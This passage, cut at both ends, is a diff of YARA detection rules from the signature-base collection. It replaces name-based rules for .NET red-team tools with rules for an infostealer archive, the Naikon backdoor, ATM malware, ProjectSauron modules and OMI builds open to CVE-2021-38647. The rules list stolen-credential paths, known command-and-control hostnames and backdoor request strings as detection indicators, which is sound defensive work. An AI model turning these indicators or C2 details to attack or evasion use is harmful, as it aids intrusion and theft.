-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "8ce14c6b720281f43c75ce52e23ec13d08e7b2be1c5fbc2d704238f1fdd1a07f"
+		hash2 = "011c19d18fa446a2619b3a2512dacb2694e1da99a2c2ea7828769f1373ecd8fe"
+		hash3 = "418530bc7210f74ada8e7f16b41ea2033054e99f0c4423ce1d3ebf973c89e3a3"
+		hash4 = "aa6e2c8447f66527f9b6f4d54f57edc6cabe56095df94dc0656dca02e11356ab"
+		hash5 = "bbfb608061931565debac405ffebe3c4bb5dac8042443fe4e80aa03395955bd2"
+		hash6 = "c15107beecf3301fb12d140690034717e16bd5312a746e7ff43a7925e5533260"
 
 	strings:
-		$name = "ATPMiniDump" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$sa1 = "passwords.txt" ascii
+		$sa2 = "autofills/" ascii
+		$sa3 = "browsers/cookies/" ascii
+		$sa4 = "wallets/" ascii
+		$sb1 = "Passwords.txt" ascii
+		$sb2 = "Autofills/" ascii
+		$sb3 = "Browsers/Cookies/" ascii
+		$sb4 = "Wallets/" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		uint16( 0 ) == 0x4b50 and filesize < 5000KB and ( 2 of ( $sa* ) or 2 of ( $sb* ) )
 }
-rule SIGNATURE_BASE_SUSP_NET_NAME_Confuserex : FILE
+rule SIGNATURE_BASE_MAL_Backdoor_Naikon_APT_Sample1 : FILE
 {
 	meta:
-		description = "Detects ConfuserEx packed file"
-		author = "Arnim Rupp"
-		id = "f1bda14e-c9fe-5341-8962-691a66233eb0"
-		date = "2021-01-22"
-		modified = "2021-01-25"
-		reference = "https://github.com/yck1509/ConfuserEx"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L219-L234"
+		description = "Detects backdoors related to the Naikon APT"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ba79285b-7c7f-5b19-837e-6696e50a2866"
+		date = "2015-05-14"
+		modified = "2023-01-06"
+		reference = "https://goo.gl/7vHyvh"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_naikon.yar#L2-L36"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "beecb7b66830a033e2048da246d320c1ffc5015b280b34fb61aee87c8a42fff3"
-		score = 40
+		hash = "d5716c80cba8554eb79eecfb4aa3d99faf0435a1833ec5ef51f528146c758eba"
+		hash = "f5ab8e49c0778fa208baad660fe4fa40fc8a114f5f71614afbd6dcc09625cb96"
+		logic_hash = "e582fc3518dab2392a79909b5369c48656b6f280b915fad4befb0839ec7ce1bd"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$name = "ConfuserEx" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$x0 = "GET http://%s:%d/aspxabcdef.asp?%s HTTP/1.1" fullword ascii
+		$x1 = "POST http://%s:%d/aspxabcdefg.asp?%s HTTP/1.1" fullword ascii
+		$x2 = "greensky27.vicp.net" fullword ascii
+		$x3 = "\\tempvxd.vxd.dll" wide
+		$x5 = "otna.vicp.net" fullword ascii
+		$s1 = "User-Agent: webclient" fullword ascii
+		$s2 = "\\User.ini" ascii
+		$s3 = "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/200" ascii
+		$s4 = "\\UserProfile.dll" wide
+		$s5 = "Connection:Keep-Alive: %d" fullword ascii
+		$s6 = "Referer: http://%s:%d/" ascii
+		$s7 = "%s %s %s %d %d %d " fullword ascii
+		$s8 = "%s--%s" fullword wide
+		$s9 = "Run File Success!" fullword wide
+		$s10 = "DRIVE_REMOTE" fullword wide
+		$s11 = "ProxyEnable" fullword wide
+		$s12 = "\\cmd.exe" wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $x* ) or 7 of ( $s* ) )
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Sharpbuster : FILE
+rule SIGNATURE_BASE_SUSP_Microsoft_7Z_SFX_Combo : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "d30c8ee5-88b9-53b5-b209-51f6f3b988cf"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/passthehashbrowns/SharpBuster"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L236-L249"
+		description = "Detects a suspicious file that has a Microsoft copyright and is a 7z SFX"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9163a689-c3ee-59b1-bf58-aef5d3072be6"
+		date = "2018-09-16"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_sfx_with_microsoft_copyright.yar#L1-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cdc19e03f75f34e6349937c0bff313298fc9310f361eec7af022c450d083ad96"
-		score = 75
+		logic_hash = "f48887e0c1031d180e25f2d1b9e016d434f594aef283ab3af8418e86496d2eac"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "cce63f209ee4efb4f0419fb4bbb32326392b5ef85cfba80b5b42b861637f1ff1"
 
 	strings:
-		$name = "SharpBuster" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$s1 = "7ZSfx%03x.cmd" fullword wide
+		$s2 = "7z SFX: error" fullword ascii
+		$c1 = { 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70
+              00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9
+              00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F
+              00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F
+              00 72 00 61 00 74 00 69 00 6F 00 6E 00 2E 00 20
+              00 41 00 6C 00 6C 00 20 00 72 00 69 00 67 00 68
+              00 74 00 73 00 20 00 72 00 65 00 73 00 65 00 72
+              00 76 00 65 00 64 00 2E }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and 1 of ( $s* ) and $c1
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Amsibypass : FILE
+rule SIGNATURE_BASE_SUSP_Microsoft_RAR_SFX_Combo : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "26db14d8-1034-5bd1-a719-4756c832901d"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/0xB455/AmsiBypass"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L251-L269"
+		description = "Detects a suspicious file that has a Microsoft copyright and is a RAR SFX"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0fa81a9e-2f41-5783-9786-bb6d33b82bd9"
+		date = "2018-09-16"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_sfx_with_microsoft_copyright.yar#L27-L50"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "8fa4ba512b34a898c4564a8eac254b6a786d195b"
-		logic_hash = "f93b1014c7e26462fbbd3cd572cfa21a09c5da915a9a51d3e58a46a2b9b7cfe4"
-		score = 75
+		logic_hash = "a0f29fcf86139a6f95b4ab0095154bd26b555f1576b5a2e263c1939bc30e3431"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s_name = "AmsiBypass" ascii wide
-		$s_compile = "AssemblyTitle" ascii wide
-		$fp1 = "Adaptive Threat Protection" wide
+		$s1 = "winrarsfxmappingfile.tmp" fullword wide
+		$s2 = "WinRAR self-extracting archive" fullword wide
+		$s3 = "WINRAR.SFX" fullword
+		$c1 = { 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70
+              00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9
+              00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F
+              00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F
+              00 72 00 61 00 74 00 69 00 6F 00 6E 00 2E 00 20
+              00 41 00 6C 00 6C 00 20 00 72 00 69 00 67 00 68
+              00 74 00 73 00 20 00 72 00 65 00 73 00 65 00 72
+              00 76 00 65 00 64 00 2E }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of ( $s* ) and not 1 of ( $fp* )
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and 1 of ( $s* ) and $c1
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Recon_AD : FILE
+
+rule SIGNATURE_BASE_ATM_Malware_Dispenserxfs_1 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "097de5cd-0cd4-59cc-a7b7-54cad8e6d230"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/outflanknl/Recon-AD"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L271-L284"
+		description = "Detects ATM Malware DispenserXFS"
+		author = "@Xylit0l @r3c0nst / Modified by Florian Roth"
+		id = "7c06102c-93d3-52f4-8c25-430f6f7a601f"
+		date = "2019-02-27"
+		modified = "2023-01-06"
+		reference = "https://twitter.com/r3c0nst/status/1100775857306652673"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_atm_dispenserxfs.yar#L4-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7bfafb2d3e85bb584bd02cb92457d22b07626f71d071c44a4aefbb5748045446"
-		score = 75
+		logic_hash = "3c7331b29f7cd8c40f99e235664f86361ba99c9ca0092c1cfb6faf367764303e"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$name = "Recon-AD" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$xc1 = { 68 FF FF 00 00 68 60 EA 00 00 6A 10 }
+		$s1 = "\\dispenserXFS.pdb" ascii
+		$s3 = "C:\\xfsasdf.txt" fullword ascii
+		$s4 = "Injected mxsfs killer into %d." fullword ascii
+		$s5 = "Waiting for freeze msxfs processes..." fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		uint16( 0 ) == 0x5A4D and ( 1 of them or pe.imphash ( ) == "617e037ae26d1931818db0790fb44bfe" )
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Sharpwatchdogs : FILE
+rule SIGNATURE_BASE_Apt_Projectsauron_Pipe_Backdoor : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "5343be58-879a-5fe7-9036-ee6a22d85f22"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/RITRedteam/SharpWatchdogs"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L286-L299"
+		description = "Rule to detect ProjectSauron pipe backdoors"
+		author = "Kaspersky Lab"
+		id = "5a1dd4b3-a03c-51bb-a7bc-25729b487f70"
+		date = "2016-08-08"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/blog/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_project_sauron.yara#L4-L21"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3b9410d7e502a5fd55e534d8fe79710d48cf65a0e9859bdd0fea6c8d32311df0"
+		logic_hash = "72f6c6fa65f15e4bab18a0f9d5b5b2f571b21d70c7ff306020784ce604a2e0a5"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		version = "1.0"
 
 	strings:
-		$name = "SharpWatchdogs" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$a1 = "CreateNamedPipeW" fullword ascii
+		$a2 = "SetSecurityDescriptorDacl" fullword ascii
+		$a3 = "GetOverlappedResult" fullword ascii
+		$a4 = "TerminateThread" fullword ascii
+		$a5 = "%s%s%X" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		uint16( 0 ) == 0x5A4D and ( all of ( $a* ) ) and filesize < 100000
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Sharpcat : FILE
+
+rule SIGNATURE_BASE_Apt_Projectsauron_Encrypted_LSA : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "a46be8d3-bf7b-5d86-b88b-33e6c8c152d8"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/Cn33liz/SharpCat"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L301-L314"
+		description = "Rule to detect ProjectSauron encrypted LSA samples"
+		author = "Kaspersky Lab"
+		id = "f6fd8619-60f0-5c0d-aa66-cd0e154de63c"
+		date = "2016-08-08"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/blog/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_project_sauron.yara#L23-L47"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b9e5946f8df1649e71abf014aa6579edbbc93a12ddcc56f8d85d97ae087c8711"
+		logic_hash = "aaeee77b596e304836e23241fdc602d0ffed3379b386724210859c84033ac2b5"
 		score = 75
-		quality = 85
+		quality = 60
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		version = "1.0"
 
 	strings:
-		$name = "SharpCat" ascii wide fullword
-		$compile = "AssemblyTitle" ascii wide fullword
+		$a1 = "EFEB0A9C6ABA4CF5958F41DB6A31929776C643DEDC65CC9B67AB8B0066FF2492" fullword ascii
+		$a2 = "\\Device\\NdisRaw_" ascii
+		$a3 = "\\\\.\\GLOBALROOT\\Device\\{8EDB44DC-86F0-4E0E-8068-BD2CABA4057A}" fullword wide
+		$a4 = "Global\\{a07f6ba7-8383-4104-a154-e582e85a32eb}" fullword wide
+		$a5 = "Missing function %S::#%d" fullword wide
+		$a6 = {8945D08D8598FEFFFF2BD08945D88D45BC83C20450C745C0030000008975C48955DCFF55FC8BF88D8F0000003A83F90977305333DB53FF15}
+		$a7 = {488D4C24304889442450488D452044886424304889442460488D4520C7442434030000002BD848897C243844896C244083C308895C246841FFD68D880000003A8BD883F909772DFF}
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		uint16( 0 ) == 0x5A4D and ( any of ( $a* ) or ( pe.exports ( "InitializeChangeNotify" ) and pe.exports ( "PasswordChangeNotify" ) and math.entropy ( 0x400 , filesize ) >= 7.5 ) ) and filesize < 1000000
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_K8Tools : FILE
+
+rule SIGNATURE_BASE_Apt_Projectsauron_Encrypted_SSPI : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "b30fc856-073d-542f-b222-a957322732c2"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/k8gege/K8tools"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L316-L329"
+		description = "Rule to detect encrypted ProjectSauron SSPI samples"
+		author = "Kaspersky Lab"
+		id = "43c0e772-46d2-510e-bea1-6f505199f38c"
+		date = "2016-08-08"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/blog/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_project_sauron.yara#L49-L63"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "370cab83917bbc76f7f3a1b7793773ddf139879880e55efe59c72a07b34120f1"
+		logic_hash = "99d7444ffc45076e97ac3f5c9909ae26a927bbdcfef274d12d162c59e8113d65"
 		score = 75
-		quality = 85
+		quality = 60
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-
-	strings:
-		$name = "K8tools" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		version = "1.0"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		uint16( 0 ) == 0x5A4D and filesize < 1000000 and pe.exports ( "InitSecurityInterfaceA" ) and pe.characteristics & pe.DLL and ( pe.machine == pe.MACHINE_AMD64 or pe.machine == pe.MACHINE_IA64 ) and math.entropy ( 0x400 , filesize ) >= 7.5
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Httpsbeaconshell : FILE
+rule SIGNATURE_BASE_Apt_Projectsauron_Mytrampoline : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "3bd7234b-a23e-5818-aed1-52d42023943b"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/limbenjamin/HTTPSBeaconShell"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L331-L344"
+		description = "Rule to detect ProjectSauron MyTrampoline module"
+		author = "Kaspersky Lab"
+		id = "b4f2cabf-11da-5fa1-8c23-0a177f8a4741"
+		date = "2016-08-08"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/blog/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_project_sauron.yara#L65-L83"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6a0d7e1f796ae6cefa297978c743916a08b2406c37fa2c1f3f697a17cb032517"
+		logic_hash = "0bd98815fbf6e82cf477e4f4f98360a4c132b2b21e2e5991f6c10903bd4df52b"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		version = "1.0"
 
 	strings:
-		$name = "HTTPSBeaconShell" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$a1 = ":\\System Volume Information\\{" wide
+		$a2 = "\\\\.\\PhysicalDrive%d" wide
+		$a3 = "DMWndClassX%d"
+		$b1 = "{774476DF-C00F-4e3a-BF4A-6D8618CFA532}" ascii wide
+		$b2 = "{820C02A4-578A-4750-A409-62C98F5E9237}" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		uint16( 0 ) == 0x5A4D and filesize < 5000000 and ( all of ( $a* ) or any of ( $b* ) )
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Ghostpack_Compiledbinaries : FILE
+
+rule SIGNATURE_BASE_Apt_Projectsauron_Encrypted_Container : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "7cc81894-8c01-5a17-a7ed-1cb4cf1e2d53"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/r3motecontrol/Ghostpack-CompiledBinaries"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L346-L359"
+		description = "Rule to detect ProjectSauron samples encrypted container"
+		author = "Kaspersky Lab"
+		id = "4462ebd9-24eb-570a-94b8-6fa6bf2a5a63"
+		date = "2016-08-08"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/blog/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_project_sauron.yara#L85-L103"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a8e90f07b7d1ec309e51e3606169a05c4bb2b2aa7e31ca26b21f927d648c13cd"
+		logic_hash = "9b36f2f1161fd2ff856db520efca8648892656b7a2587dce1a7445af4fbba013"
 		score = 75
-		quality = 85
+		quality = 60
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		version = "1.0"
 
 	strings:
-		$name = "Ghostpack-CompiledBinaries" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$vfs_header = {02 AA 02 C1 02 0?}
+		$salt = {91 0A E0 CC 0D FE CE 36 78 48 9B 9C 97 F7 F5 55}
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		uint16( 0 ) == 0x5A4D and ( ( @vfs_header < 0x4000 ) or $salt ) and math.entropy ( 0x400 , filesize ) >= 6.5 and ( filesize > 0x400 ) and filesize < 10000000
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Metasploit_Sharp : FILE
+rule SIGNATURE_BASE_Apt_Projectsauron_Encryption : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "b425f241-4887-5368-b42b-3fbbd3b769c6"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/VolatileMindsLLC/metasploit-sharp"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L361-L374"
+		description = "Rule to detect ProjectSauron string encryption"
+		author = "Kaspersky Lab"
+		id = "b3139045-54f5-5d59-980b-8510faa9ad0e"
+		date = "2016-08-08"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/blog/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_project_sauron.yara#L105-L123"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7a1c4e077e197a5cdca8cb12713abb3fa86a3f6ea8e8f2f632c9c8e42d829acc"
+		logic_hash = "ae3a681b0cf9ed93d25fa35982daab48c460ba9737eb643ba28a972ea3a7b401"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		version = "1.0"
 
 	strings:
-		$name = "metasploit-sharp" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$a1 = {81??02AA02C175??8B??0685}
+		$a2 = {918D9A94CDCC939A93939BD18B9AB8DE9C908DAF8D9B9BBE8C8C9AFF}
+		$a3 = {803E225775??807E019F75??807E02BE75??807E0309}
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		filesize < 5000000 and any of ( $a* )
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Trevorc2 : FILE
+rule SIGNATURE_BASE_Apt_Projectsauron_Generic_Pipe_Backdoor : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "d1634a0d-6964-5886-b836-85c3ce6b8a17"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/trustedsec/trevorc2"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L376-L389"
+		description = "Rule to detect ProjectSauron generic pipe backdoors"
+		author = "Kaspersky Lab"
+		id = "77a82c67-7ee1-5d1f-ad75-28ce174e41bc"
+		date = "2016-08-08"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/blog/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_project_sauron.yara#L125-L144"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c1d56ef865e6619d9d0deff90b154c63cc3036a8521d3952819e45f51fca9fea"
+		logic_hash = "ec8a311ec1bd98532c278f72c77e58edb5890db940046dfcd14adf1495e9de1e"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		version = "1.0"
 
 	strings:
-		$name = "trevorc2" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$a = { C7 [2-3] 32 32 32 32 E8 }
+		$b = { 42 12 67 6B }
+		$c = { 25 31 5F 73 }
+		$d = "rand"
+		$e = "WS2_32"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		uint16( 0 ) == 0x5A4D and ( all of them ) and filesize < 400000
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Nativepayload_DNS2 : FILE
+rule SIGNATURE_BASE_VULN_LNX_OMI_RCE_CVE_2021_386471_Sep21 : CVE_2021_38647 FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "0fa01355-de57-573e-9056-0b7a5d24572d"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/DamonMohammadbagher/NativePayload_DNS2"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L391-L404"
+		description = "Detects a Linux OMI version vulnerable to CVE-2021-38647 (OMIGOD) which enables an unauthenticated RCE"
+		author = "Christian Burkard"
+		id = "ca49f0cc-ea33-559c-bd4f-306a01315fce"
+		date = "2021-09-16"
+		modified = "2023-12-05"
+		reference = "https://www.wiz.io/blog/secret-agent-exposes-azure-customers-to-unauthorized-code-execution"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/vul_cve_2021_386471_omi.yar#L1-L37"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "765e6117f69fb58e5e71544badc8135b2ec641a74cc0489a7c79308ca2837bd7"
-		score = 75
+		logic_hash = "99fddcf763f41a08a8ef8240d544ef67b840a1b5ae709bd7efbcbcad8268e8a5"
+		score = 50
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "CVE-2021-38647, FILE"
 
 	strings:
-		$name = "NativePayload_DNS2" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$a1 = "/opt/omi/bin/omiagent" ascii fullword
+		$s1 = "OMI-1.6.8-0 - " ascii
+		$s2 = "OMI-1.6.6-0 - " ascii
+		$s3 = "OMI-1.6.4-1 - " ascii
+		$s4 = "OMI-1.6.4-0 - " ascii
+		$s5 = "OMI-1.6.2-0 - " ascii
+		$s6 = "OMI-1.6.1-0 - " ascii
+		$s7 = "OMI-1.5.0-0 - " ascii
+		$s8 = "OMI-1.4.4-0 - " ascii
+		$s9 = "OMI-1.4.3-2 - " ascii
+		$s10 = "OMI-1.4.3-1 - " ascii
+		$s11 = "OMI-1.4.3-0 - " ascii
+		$s12 = "OMI-1.4.2-5 - " ascii
+		$s13 = "OMI-1.4.2-4 - " ascii
+		$s14 = "OMI-1.4.2-3 - " ascii
+		$s15 = "OMI-1.4.2-2 - " ascii
+		$s16 = "OMI-1.4.2-1 - " ascii
+		$s17 = "OMI-1.4.1-1 - " ascii
+		$s18 = "OMI-1.4.1-0 - " ascii
+		$s19 = "OMI-1.4.0-6 - " ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		uint32be( 0 ) == 0x7f454c46 and $a1 and 1 of ( $s* )
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Aggressiveproxy : FILE
